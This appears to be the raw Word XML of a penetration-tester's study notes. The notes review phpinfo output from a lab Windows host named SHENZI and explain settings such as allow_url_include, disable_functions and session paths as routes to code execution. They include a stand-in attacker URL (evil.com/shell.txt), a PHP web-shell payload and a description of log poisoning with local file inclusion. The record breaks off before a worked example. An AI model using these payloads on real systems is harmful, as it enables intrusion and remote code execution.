            <wp:docPr id="444" name="image448.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image448.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1930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0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The hostname is SHENZI, and it is running 64-bit Windows 10 build 19042.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000431">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000432">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000433">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="381000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="344" name="image357.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image357.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="38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4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We find a user named 'shenzi' in the path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000435">
      <w:pPr>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen and allow_url_include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000438">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="698500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="559" name="image549.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image549.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="698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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen = On</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows PHP functions like fopen(), file_get_contents(), and include() to access remote files over protocols like HTTP, FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this enabled, a vulnerable script using file_get_contents($user_input) could fetch remote content from an attacker-controlled URL, enabling data exfiltration or remote code delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While this alone doesn't allow code execution, it enables reading remote resources (e.g., SSRF-like behavior).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow_url_include = Off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it was on, you can get code execution using PHP wrapper. Look at "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Wrappers (from XXXXXXXXX 9.2.2. PHP Wrappers)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section for more information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if it was on, you can do LFI attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000440">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This controls whether PHP's include and require functions can load remote files via a URL (e.g., include("</w:t>
      </w:r>
      <w:hyperlink r:id="rId65">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://evil.com/shell.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">")).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it's Off, even if you can control an include() parameter, PHP won't fetch and execute remote code from a URL.</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000444">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000445">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document_Root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000446">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5930900" cy="304800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="138" name="image137.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image137.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59309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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows the root directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000448">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000449">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$_SERVER['DOCUMENT_ROOT']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5148263" cy="849793"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="418" name="image418.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image418.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5148263" cy="849793"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="513"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is another one that should show the root directory of website</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">disable_classes and disable_functions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="558800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="463" name="image458.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image458.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1356"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable_functions of 'no value' means we are able to use malicious PHP functions like exec(), system(), shell_exec() (if we can get code execution) because they have not been disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000450">
      <w:pPr>
        <w:rPr/>
      </w:pP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session.save_path:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000452">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="177800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="304" name="image296.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image296.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This can be useful for an</w:t>
      </w:r>
      <w:hyperlink r:id="rId70">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId71">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Local File Inclusion to Remote Code Execution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability (via phpinfo.php). If we find LFI, we can keep this in mind.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000454">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This path is where</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP session files are stored</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a user visits a PHP application, their session data (including variables like $_SESSION['username']) gets written to a file in this directory — typically with a name like sess_&lt;session_id&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000455">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1215"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../xampp/tmp/sess_abcd1234 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for example</w:t>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t xml:space="preserve">$_SERVER['HTTP_USER_AGENT']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000458">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="152400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="385" name="image367.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image367.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a reflection of MY user-agent. I have control of that, is this useful? Like when we poison a log file for php code execution, can I poison this? I am genuinely am not sure but I get a little tingly when I see user controlled information reflected by a PHP page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">According to chatGPT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can poison it if you get LFI and if user-agent gets put in the logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the application logs the user-agent (common in access logs), and you inject PHP code like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then if you later find a Local File Inclusion (LFI) vulnerability, and can include the log file (e.g., /var/log/apache2/access.log or C:\xampp\apache\logs\access.log), you may execute the PHP code you planted in the log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An example of how to do it:</w:t>
      </w:r>
    </w:p>
